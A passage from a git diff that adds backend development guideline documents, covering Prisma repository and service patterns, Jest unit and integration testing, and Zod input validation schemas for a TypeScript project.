Repository: "Here's the Prisma query that does that"
|
||||||
|
```
|
||||||
|
|
||||||
|
**Repositories are responsible for:**
|
||||||
|
- ✅ All Prisma operations
|
||||||
|
- ✅ Query construction
|
||||||
|
- ✅ Query optimization (select, include)
|
||||||
|
- ✅ Database error handling
|
||||||
|
- ✅ Caching database results
|
||||||
|
|
||||||
|
**Repositories should NOT:**
|
||||||
|
- ❌ Contain business logic
|
||||||
|
- ❌ Know about HTTP
|
||||||
|
- ❌ Make decisions (that's service layer)
|
||||||
|
|
||||||
|
### Repository Template
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// repositories/UserRepository.ts
|
||||||
|
import { PrismaService } from '@project-lifecycle-portal/database';
|
||||||
|
import type { User, Prisma } from '@project-lifecycle-portal/database';
|
||||||
|
|
||||||
|
export class UserRepository {
|
||||||
|
/**
|
||||||
|
* Find user by ID with optimized query
|
||||||
|
*/
|
||||||
|
async findById(userId: string): Promise<User | null> {
|
||||||
|
try {
|
||||||
|
return await PrismaService.main.user.findUnique({
|
||||||
|
where: { userID: userId },
|
||||||
|
select: {
|
||||||
|
userID: true,
|
||||||
|
email: true,
|
||||||
|
name: true,
|
||||||
|
isActive: true,
|
||||||
|
roles: true,
|
||||||
|
createdAt: true,
|
||||||
|
updatedAt: true,
|
||||||
|
},
|
||||||
|
});
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[UserRepository] Error finding user by ID:', error);
|
||||||
|
throw new Error(`Failed to find user: ${userId}`);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Find all active users
|
||||||
|
*/
|
||||||
|
async findActive(options?: { orderBy?: Prisma.UserOrderByWithRelationInput }): Promise<User[]> {
|
||||||
|
try {
|
||||||
|
return await PrismaService.main.user.findMany({
|
||||||
|
where: { isActive: true },
|
||||||
|
orderBy: options?.orderBy || { name: 'asc' },
|
||||||
|
select: {
|
||||||
|
userID: true,
|
||||||
|
email: true,
|
||||||
|
name: true,
|
||||||
|
roles: true,
|
||||||
|
},
|
||||||
|
});
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[UserRepository] Error finding active users:', error);
|
||||||
|
throw new Error('Failed to find active users');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Find user by email
|
||||||
|
*/
|
||||||
|
async findByEmail(email: string): Promise<User | null> {
|
||||||
|
try {
|
||||||
|
return await PrismaService.main.user.findUnique({
|
||||||
|
where: { email },
|
||||||
|
});
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[UserRepository] Error finding user by email:', error);
|
||||||
|
throw new Error(`Failed to find user with email: ${email}`);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Create new user
|
||||||
|
*/
|
||||||
|
async create(data: Prisma.UserCreateInput): Promise<User> {
|
||||||
|
try {
|
||||||
|
return await PrismaService.main.user.create({ data });
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[UserRepository] Error creating user:', error);
|
||||||
|
throw new Error('Failed to create user');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Update user
|
||||||
|
*/
|
||||||
|
async update(userId: string, data: Prisma.UserUpdateInput): Promise<User> {
|
||||||
|
try {
|
||||||
|
return await PrismaService.main.user.update({
|
||||||
|
where: { userID: userId },
|
||||||
|
data,
|
||||||
|
});
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[UserRepository] Error updating user:', error);
|
||||||
|
throw new Error(`Failed to update user: ${userId}`);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Delete user (soft delete by setting isActive = false)
|
||||||
|
*/
|
||||||
|
async delete(userId: string): Promise<User> {
|
||||||
|
try {
|
||||||
|
return await PrismaService.main.user.update({
|
||||||
|
where: { userID: userId },
|
||||||
|
data: { isActive: false },
|
||||||
|
});
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[UserRepository] Error deleting user:', error);
|
||||||
|
throw new Error(`Failed to delete user: ${userId}`);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Check if email exists
|
||||||
|
*/
|
||||||
|
async emailExists(email: string): Promise<boolean> {
|
||||||
|
try {
|
||||||
|
const count = await PrismaService.main.user.count({
|
||||||
|
where: { email },
|
||||||
|
});
|
||||||
|
return count > 0;
|
||||||
|
} catch (error) {
|
||||||
|
console.error('[UserRepository] Error checking email exists:', error);
|
||||||
|
throw new Error('Failed to check if email exists');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Export singleton instance
|
||||||
|
export const userRepository = new UserRepository();
|
||||||
|
```
|
||||||
|
|
||||||
|
**Using Repository in Service:**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// services/userService.ts
|
||||||
|
import { userRepository } from '../repositories/UserRepository';
|
||||||
|
import { ConflictError, NotFoundError } from '../utils/errors';
|
||||||
|
|
||||||
|
export class UserService {
|
||||||
|
/**
|
||||||
|
* Create new user with business rules
|
||||||
|
*/
|
||||||
|
async createUser(data: { email: string; name: string; roles: string[] }): Promise<User> {
|
||||||
|
// Business rule: Check if email already exists
|
||||||
|
const emailExists = await userRepository.emailExists(data.email);
|
||||||
|
if (emailExists) {
|
||||||
|
throw new ConflictError('Email already exists');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Business rule: Validate roles
|
||||||
|
const validRoles = ['admin', 'operations', 'user'];
|
||||||
|
const invalidRoles = data.roles.filter((role) => !validRoles.includes(role));
|
||||||
|
if (invalidRoles.length > 0) {
|
||||||
|
throw new ValidationError(`Invalid roles: ${invalidRoles.join(', ')}`);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create user via repository
|
||||||
|
return await userRepository.create({
|
||||||
|
email: data.email,
|
||||||
|
name: data.name,
|
||||||
|
roles: data.roles,
|
||||||
|
isActive: true,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Get user by ID
|
||||||
|
*/
|
||||||
|
async getUser(userId: string): Promise<User> {
|
||||||
|
const user = await userRepository.findById(userId);
|
||||||
|
|
||||||
|
if (!user) {
|
||||||
|
throw new NotFoundError(`User not found: ${userId}`);
|
||||||
|
}
|
||||||
|
|
||||||
|
return user;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Service Design Principles
|
||||||
|
|
||||||
|
### 1. Single Responsibility
|
||||||
|
|
||||||
|
Each service should have ONE clear purpose:
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ GOOD - Single responsibility
|
||||||
|
class UserService {
|
||||||
|
async createUser() {}
|
||||||
|
async updateUser() {}
|
||||||
|
async deleteUser() {}
|
||||||
|
}
|
||||||
|
|
||||||
|
class EmailService {
|
||||||
|
async sendEmail() {}
|
||||||
|
async sendBulkEmails() {}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ❌ BAD - Too many responsibilities
|
||||||
|
class UserService {
|
||||||
|
async createUser() {}
|
||||||
|
async sendWelcomeEmail() {} // Should be EmailService
|
||||||
|
async logUserActivity() {} // Should be AuditService
|
||||||
|
async processPayment() {} // Should be PaymentService
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### 2. Clear Method Names
|
||||||
|
|
||||||
|
Method names should describe WHAT they do:
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ GOOD - Clear intent
|
||||||
|
async createNotification()
|
||||||
|
async getUserPreferences()
|
||||||
|
async shouldBatchEmail()
|
||||||
|
async routeNotification()
|
||||||
|
|
||||||
|
// ❌ BAD - Vague or misleading
|
||||||
|
async process()
|
||||||
|
async handle()
|
||||||
|
async doIt()
|
||||||
|
async execute()
|
||||||
|
```
|
||||||
|
|
||||||
|
### 3. Return Types
|
||||||
|
|
||||||
|
Always use explicit return types:
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ GOOD - Explicit types
|
||||||
|
async createUser(data: CreateUserDTO): Promise<User> {}
|
||||||
|
async findUsers(): Promise<User[]> {}
|
||||||
|
async deleteUser(id: string): Promise<void> {}
|
||||||
|
|
||||||
|
// ❌ BAD - Implicit any
|
||||||
|
async createUser(data) {} // No types!
|
||||||
|
```
|
||||||
|
|
||||||
|
### 4. Error Handling
|
||||||
|
|
||||||
|
Services should throw meaningful errors:
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ GOOD - Meaningful errors
|
||||||
|
if (!user) {
|
||||||
|
throw new NotFoundError(`User not found: ${userId}`);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (emailExists) {
|
||||||
|
throw new ConflictError('Email already exists');
|
||||||
|
}
|
||||||
|
|
||||||
|
// ❌ BAD - Generic errors
|
||||||
|
if (!user) {
|
||||||
|
throw new Error('Error'); // What error?
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### 5. Avoid God Services
|
||||||
|
|
||||||
|
Don't create services that do everything:
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ BAD - God service
|
||||||
|
class WorkflowService {
|
||||||
|
async startWorkflow() {}
|
||||||
|
async completeStep() {}
|
||||||
|
async assignRoles() {}
|
||||||
|
async sendNotifications() {} // Should be NotificationService
|
||||||
|
async validatePermissions() {} // Should be PermissionService
|
||||||
|
async logAuditTrail() {} // Should be AuditService
|
||||||
|
// ... 50 more methods
|
||||||
|
}
|
||||||
|
|
||||||
|
// ✅ GOOD - Focused services
|
||||||
|
class WorkflowService {
|
||||||
|
constructor(
|
||||||
|
private notificationService: NotificationService,
|
||||||
|
private permissionService: PermissionService,
|
||||||
|
private auditService: AuditService
|
||||||
|
) {}
|
||||||
|
|
||||||
|
async startWorkflow() {
|
||||||
|
// Orchestrate other services
|
||||||
|
await this.permissionService.checkPermission();
|
||||||
|
await this.workflowRepository.create();
|
||||||
|
await this.notificationService.notify();
|
||||||
|
await this.auditService.log();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Caching Strategies
|
||||||
|
|
||||||
|
### 1. In-Memory Caching
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
class UserService {
|
||||||
|
private cache: Map<string, { user: User; timestamp: number }> = new Map();
|
||||||
|
private CACHE_TTL = 5 * 60 * 1000; // 5 minutes
|
||||||
|
|
||||||
|
async getUser(userId: string): Promise<User> {
|
||||||
|
// Check cache
|
||||||
|
const cached = this.cache.get(userId);
|
||||||
|
if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
|
||||||
|
return cached.user;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fetch from database
|
||||||
|
const user = await userRepository.findById(userId);
|
||||||
|
|
||||||
|
// Update cache
|
||||||
|
if (user) {
|
||||||
|
this.cache.set(userId, { user, timestamp: Date.now() });
|
||||||
|
}
|
||||||
|
|
||||||
|
return user;
|
||||||
|
}
|
||||||
|
|
||||||
|
clearUserCache(userId: string): void {
|
||||||
|
this.cache.delete(userId);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### 2. Cache Invalidation
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
class UserService {
|
||||||
|
async updateUser(userId: string, data: UpdateUserDTO): Promise<User> {
|
||||||
|
// Update in database
|
||||||
|
const user = await userRepository.update(userId, data);
|
||||||
|
|
||||||
|
// Invalidate cache
|
||||||
|
this.clearUserCache(userId);
|
||||||
|
|
||||||
|
return user;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Testing Services
|
||||||
|
|
||||||
|
### Unit Tests
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// tests/userService.test.ts
|
||||||
|
import { UserService } from '../services/userService';
|
||||||
|
import { userRepository } from '../repositories/UserRepository';
|
||||||
|
import { ConflictError } from '../utils/errors';
|
||||||
|
|
||||||
|
// Mock repository
|
||||||
|
jest.mock('../repositories/UserRepository');
|
||||||
|
|
||||||
|
describe('UserService', () => {
|
||||||
|
let userService: UserService;
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
userService = new UserService();
|
||||||
|
jest.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('createUser', () => {
|
||||||
|
it('should create user when email does not exist', async () => {
|
||||||
|
// Arrange
|
||||||
|
const userData = {
|
||||||
|
email: 'test@example.com',
|
||||||
|
name: 'Test User',
|
||||||
|
roles: ['user'],
|
||||||
|
};
|
||||||
|
|
||||||
|
(userRepository.emailExists as jest.Mock).mockResolvedValue(false);
|
||||||
|
(userRepository.create as jest.Mock).mockResolvedValue({
|
||||||
|
userID: '123',
|
||||||
|
...userData,
|
||||||
|
});
|
||||||
|
|
||||||
|
// Act
|
||||||
|
const user = await userService.createUser(userData);
|
||||||
|
|
||||||
|
// Assert
|
||||||
|
expect(user).toBeDefined();
|
||||||
|
expect(user.email).toBe(userData.email);
|
||||||
|
expect(userRepository.emailExists).toHaveBeenCalledWith(userData.email);
|
||||||
|
expect(userRepository.create).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should throw ConflictError when email exists', async () => {
|
||||||
|
// Arrange
|
||||||
|
const userData = {
|
||||||
|
email: 'existing@example.com',
|
||||||
|
name: 'Test User',
|
||||||
|
roles: ['user'],
|
||||||
|
};
|
||||||
|
|
||||||
|
(userRepository.emailExists as jest.Mock).mockResolvedValue(true);
|
||||||
|
|
||||||
|
// Act & Assert
|
||||||
|
await expect(userService.createUser(userData)).rejects.toThrow(ConflictError);
|
||||||
|
expect(userRepository.create).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md) - Main guide
|
||||||
|
- [routing-and-controllers.md](routing-and-controllers.md) - Controllers that use services
|
||||||
|
- [database-patterns.md](database-patterns.md) - Prisma and repository patterns
|
||||||
|
- [complete-examples.md](complete-examples.md) - Full service/repository examples
|
||||||
235
skills/backend-dev-guidelines/resources/testing-guide.md
Normal file
235
skills/backend-dev-guidelines/resources/testing-guide.md
Normal file
@@ -0,0 +1,235 @@
|
|||||||
|
# Testing Guide - Backend Testing Strategies
|
||||||
|
|
||||||
|
Complete guide to testing backend services with Jest and best practices.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Unit Testing](#unit-testing)
|
||||||
|
- [Integration Testing](#integration-testing)
|
||||||
|
- [Mocking Strategies](#mocking-strategies)
|
||||||
|
- [Test Data Management](#test-data-management)
|
||||||
|
- [Testing Authenticated Routes](#testing-authenticated-routes)
|
||||||
|
- [Coverage Targets](#coverage-targets)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Unit Testing
|
||||||
|
|
||||||
|
### Test Structure
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// services/userService.test.ts
|
||||||
|
import { UserService } from './userService';
|
||||||
|
import { UserRepository } from '../repositories/UserRepository';
|
||||||
|
|
||||||
|
jest.mock('../repositories/UserRepository');
|
||||||
|
|
||||||
|
describe('UserService', () => {
|
||||||
|
let service: UserService;
|
||||||
|
let mockRepository: jest.Mocked<UserRepository>;
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
mockRepository = {
|
||||||
|
findByEmail: jest.fn(),
|
||||||
|
create: jest.fn(),
|
||||||
|
} as any;
|
||||||
|
|
||||||
|
service = new UserService();
|
||||||
|
(service as any).userRepository = mockRepository;
|
||||||
|
});
|
||||||
|
|
||||||
|
afterEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('create', () => {
|
||||||
|
it('should throw error if email exists', async () => {
|
||||||
|
mockRepository.findByEmail.mockResolvedValue({ id: '123' } as any);
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
service.create({ email: 'test@test.com' })
|
||||||
|
).rejects.toThrow('Email already in use');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should create user if email is unique', async () => {
|
||||||
|
mockRepository.findByEmail.mockResolvedValue(null);
|
||||||
|
mockRepository.create.mockResolvedValue({ id: '123' } as any);
|
||||||
|
|
||||||
|
const user = await service.create({
|
||||||
|
email: 'test@test.com',
|
||||||
|
firstName: 'John',
|
||||||
|
lastName: 'Doe',
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(user).toBeDefined();
|
||||||
|
expect(mockRepository.create).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({
|
||||||
|
email: 'test@test.com'
|
||||||
|
})
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Integration Testing
|
||||||
|
|
||||||
|
### Test with Real Database
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { PrismaService } from '@project-lifecycle-portal/database';
|
||||||
|
|
||||||
|
describe('UserService Integration', () => {
|
||||||
|
let testUser: any;
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
// Create test data
|
||||||
|
testUser = await PrismaService.main.user.create({
|
||||||
|
data: {
|
||||||
|
email: 'test@test.com',
|
||||||
|
profile: { create: { firstName: 'Test', lastName: 'User' } },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
// Cleanup
|
||||||
|
await PrismaService.main.user.delete({ where: { id: testUser.id } });
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should find user by email', async () => {
|
||||||
|
const user = await userService.findByEmail('test@test.com');
|
||||||
|
expect(user).toBeDefined();
|
||||||
|
expect(user?.email).toBe('test@test.com');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Mocking Strategies
|
||||||
|
|
||||||
|
### Mock PrismaService
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
jest.mock('@project-lifecycle-portal/database', () => ({
|
||||||
|
PrismaService: {
|
||||||
|
main: {
|
||||||
|
user: {
|
||||||
|
findMany: jest.fn(),
|
||||||
|
findUnique: jest.fn(),
|
||||||
|
create: jest.fn(),
|
||||||
|
update: jest.fn(),
|
||||||
|
},
|
||||||
|
},
|
||||||
|
isAvailable: true,
|
||||||
|
},
|
||||||
|
}));
|
||||||
|
```
|
||||||
|
|
||||||
|
### Mock Services
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
const mockUserService = {
|
||||||
|
findById: jest.fn(),
|
||||||
|
create: jest.fn(),
|
||||||
|
update: jest.fn(),
|
||||||
|
} as jest.Mocked<UserService>;
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Test Data Management
|
||||||
|
|
||||||
|
### Setup and Teardown
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
describe('PermissionService', () => {
|
||||||
|
let instanceId: number;
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
// Create test post
|
||||||
|
const post = await PrismaService.main.post.create({
|
||||||
|
data: { title: 'Test Post', content: 'Test', authorId: 'test-user' },
|
||||||
|
});
|
||||||
|
instanceId = post.id;
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
// Cleanup
|
||||||
|
await PrismaService.main.post.delete({
|
||||||
|
where: { id: instanceId },
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
// Clear caches
|
||||||
|
permissionService.clearCache();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should check permissions', async () => {
|
||||||
|
const hasPermission = await permissionService.checkPermission(
|
||||||
|
'user-id',
|
||||||
|
instanceId,
|
||||||
|
'VIEW_WORKFLOW'
|
||||||
|
);
|
||||||
|
expect(hasPermission).toBeDefined();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Testing Authenticated Routes
|
||||||
|
|
||||||
|
### Using test-auth-route.js
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Test authenticated endpoint
|
||||||
|
node scripts/test-auth-route.js http://localhost:3002/form/api/users
|
||||||
|
|
||||||
|
# Test with POST data
|
||||||
|
node scripts/test-auth-route.js http://localhost:3002/form/api/users POST '{"email":"test@test.com"}'
|
||||||
|
```
|
||||||
|
|
||||||
|
### Mock Authentication in Tests
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Mock auth middleware
|
||||||
|
jest.mock('../middleware/SSOMiddleware', () => ({
|
||||||
|
SSOMiddlewareClient: {
|
||||||
|
verifyLoginStatus: (req, res, next) => {
|
||||||
|
res.locals.claims = {
|
||||||
|
sub: 'test-user-id',
|
||||||
|
preferred_username: 'testuser',
|
||||||
|
};
|
||||||
|
next();
|
||||||
|
},
|
||||||
|
},
|
||||||
|
}));
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Coverage Targets
|
||||||
|
|
||||||
|
### Recommended Coverage
|
||||||
|
|
||||||
|
- **Unit Tests**: 70%+ coverage
|
||||||
|
- **Integration Tests**: Critical paths covered
|
||||||
|
- **E2E Tests**: Happy paths covered
|
||||||
|
|
||||||
|
### Run Coverage
|
||||||
|
|
||||||
|
```bash
|
||||||
|
npm test -- --coverage
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md)
|
||||||
|
- [services-and-repositories.md](services-and-repositories.md)
|
||||||
|
- [complete-examples.md](complete-examples.md)
|
||||||
754
skills/backend-dev-guidelines/resources/validation-patterns.md
Normal file
754
skills/backend-dev-guidelines/resources/validation-patterns.md
Normal file
@@ -0,0 +1,754 @@
|
|||||||
|
# Validation Patterns - Input Validation with Zod
|
||||||
|
|
||||||
|
Complete guide to input validation using Zod schemas for type-safe validation.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Why Zod?](#why-zod)
|
||||||
|
- [Basic Zod Patterns](#basic-zod-patterns)
|
||||||
|
- [Schema Examples from Codebase](#schema-examples-from-codebase)
|
||||||
|
- [Route-Level Validation](#route-level-validation)
|
||||||
|
- [Controller Validation](#controller-validation)
|
||||||
|
- [DTO Pattern](#dto-pattern)
|
||||||
|
- [Error Handling](#error-handling)
|
||||||
|
- [Advanced Patterns](#advanced-patterns)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Why Zod?
|
||||||
|
|
||||||
|
### Benefits Over Joi/Other Libraries
|
||||||
|
|
||||||
|
**Type Safety:**
|
||||||
|
- ✅ Full TypeScript inference
|
||||||
|
- ✅ Runtime + compile-time validation
|
||||||
|
- ✅ Automatic type generation
|
||||||
|
|
||||||
|
**Developer Experience:**
|
||||||
|
- ✅ Intuitive API
|
||||||
|
- ✅ Composable schemas
|
||||||
|
- ✅ Excellent error messages
|
||||||
|
|
||||||
|
**Performance:**
|
||||||
|
- ✅ Fast validation
|
||||||
|
- ✅ Small bundle size
|
||||||
|
- ✅ Tree-shakeable
|
||||||
|
|
||||||
|
### Migration from Joi
|
||||||
|
|
||||||
|
Modern validation uses Zod instead of Joi:
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ OLD - Joi (being phased out)
|
||||||
|
const schema = Joi.object({
|
||||||
|
email: Joi.string().email().required(),
|
||||||
|
name: Joi.string().min(3).required(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// ✅ NEW - Zod (preferred)
|
||||||
|
const schema = z.object({
|
||||||
|
email: z.string().email(),
|
||||||
|
name: z.string().min(3),
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Basic Zod Patterns
|
||||||
|
|
||||||
|
### Primitive Types
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
// Strings
|
||||||
|
const nameSchema = z.string();
|
||||||
|
const emailSchema = z.string().email();
|
||||||
|
const urlSchema = z.string().url();
|
||||||
|
const uuidSchema = z.string().uuid();
|
||||||
|
const minLengthSchema = z.string().min(3);
|
||||||
|
const maxLengthSchema = z.string().max(100);
|
||||||
|
|
||||||
|
// Numbers
|
||||||
|
const ageSchema = z.number().int().positive();
|
||||||
|
const priceSchema = z.number().positive();
|
||||||
|
const rangeSchema = z.number().min(0).max(100);
|
||||||
|
|
||||||
|
// Booleans
|
||||||
|
const activeSchema = z.boolean();
|
||||||
|
|
||||||
|
// Dates
|
||||||
|
const dateSchema = z.string().datetime(); // ISO 8601 string
|
||||||
|
const nativeDateSchema = z.date(); // Native Date object
|
||||||
|
|
||||||
|
// Enums
|
||||||
|
const roleSchema = z.enum(['admin', 'operations', 'user']);
|
||||||
|
const statusSchema = z.enum(['PENDING', 'APPROVED', 'REJECTED']);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Objects
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Simple object
|
||||||
|
const userSchema = z.object({
|
||||||
|
email: z.string().email(),
|
||||||
|
name: z.string(),
|
||||||
|
age: z.number().int().positive(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Nested objects
|
||||||
|
const addressSchema = z.object({
|
||||||
|
street: z.string(),
|
||||||
|
city: z.string(),
|
||||||
|
zipCode: z.string().regex(/^\d{5}$/),
|
||||||
|
});
|
||||||
|
|
||||||
|
const userWithAddressSchema = z.object({
|
||||||
|
name: z.string(),
|
||||||
|
address: addressSchema,
|
||||||
|
});
|
||||||
|
|
||||||
|
// Optional fields
|
||||||
|
const userSchema = z.object({
|
||||||
|
name: z.string(),
|
||||||
|
email: z.string().email().optional(),
|
||||||
|
phone: z.string().optional(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Nullable fields
|
||||||
|
const userSchema = z.object({
|
||||||
|
name: z.string(),
|
||||||
|
middleName: z.string().nullable(),
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Arrays
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Array of primitives
|
||||||
|
const rolesSchema = z.array(z.string());
|
||||||
|
const numbersSchema = z.array(z.number());
|
||||||
|
|
||||||
|
// Array of objects
|
||||||
|
const usersSchema = z.array(
|
||||||
|
z.object({
|
||||||
|
id: z.string(),
|
||||||
|
name: z.string(),
|
||||||
|
})
|
||||||
|
);
|
||||||
|
|
||||||
|
// Array with constraints
|
||||||
|
const tagsSchema = z.array(z.string()).min(1).max(10);
|
||||||
|
const nonEmptyArray = z.array(z.string()).nonempty();
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Schema Examples from Codebase
|
||||||
|
|
||||||
|
### Form Validation Schemas
|
||||||
|
|
||||||
|
**File:** `/form/src/helpers/zodSchemas.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
// Question types enum
|
||||||
|
export const questionTypeSchema = z.enum([
|
||||||
|
'input',
|
||||||
|
'textbox',
|
||||||
|
'editor',
|
||||||
|
'dropdown',
|
||||||
|
'autocomplete',
|
||||||
|
'checkbox',
|
||||||
|
'radio',
|
||||||
|
'upload',
|
||||||
|
]);
|
||||||
|
|
||||||
|
// Upload types
|
||||||
|
export const uploadTypeSchema = z.array(
|
||||||
|
z.enum(['pdf', 'image', 'excel', 'video', 'powerpoint', 'word']).nullable()
|
||||||
|
);
|
||||||
|
|
||||||
|
// Input types
|
||||||
|
export const inputTypeSchema = z
|
||||||
|
.enum(['date', 'number', 'input', 'currency'])
|
||||||
|
.nullable();
|
||||||
|
|
||||||
|
// Question option
|
||||||
|
export const questionOptionSchema = z.object({
|
||||||
|
id: z.number().int().positive().optional(),
|
||||||
|
controlTag: z.string().max(150).nullable().optional(),
|
||||||
|
label: z.string().max(100).nullable().optional(),
|
||||||
|
order: z.number().int().min(0).default(0),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Question schema
|
||||||
|
export const questionSchema = z.object({
|
||||||
|
id: z.number().int().positive().optional(),
|
||||||
|
formID: z.number().int().positive(),
|
||||||
|
sectionID: z.number().int().positive().optional(),
|
||||||
|
options: z.array(questionOptionSchema).optional(),
|
||||||
|
label: z.string().max(500),
|
||||||
|
description: z.string().max(5000).optional(),
|
||||||
|
type: questionTypeSchema,
|
||||||
|
uploadTypes: uploadTypeSchema.optional(),
|
||||||
|
inputType: inputTypeSchema.optional(),
|
||||||
|
tags: z.array(z.string().max(150)).optional(),
|
||||||
|
required: z.boolean(),
|
||||||
|
isStandard: z.boolean().optional(),
|
||||||
|
deprecatedKey: z.string().nullable().optional(),
|
||||||
|
maxLength: z.number().int().positive().nullable().optional(),
|
||||||
|
isOptionsSorted: z.boolean().optional(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Form section schema
|
||||||
|
export const formSectionSchema = z.object({
|
||||||
|
id: z.number().int().positive(),
|
||||||
|
formID: z.number().int().positive(),
|
||||||
|
questions: z.array(questionSchema).optional(),
|
||||||
|
label: z.string().max(500),
|
||||||
|
description: z.string().max(5000).optional(),
|
||||||
|
isStandard: z.boolean(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Create form schema
|
||||||
|
export const createFormSchema = z.object({
|
||||||
|
id: z.number().int().positive(),
|
||||||
|
label: z.string().max(150),
|
||||||
|
description: z.string().max(6000).nullable().optional(),
|
||||||
|
isPhase: z.boolean().optional(),
|
||||||
|
username: z.string(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Update order schema
|
||||||
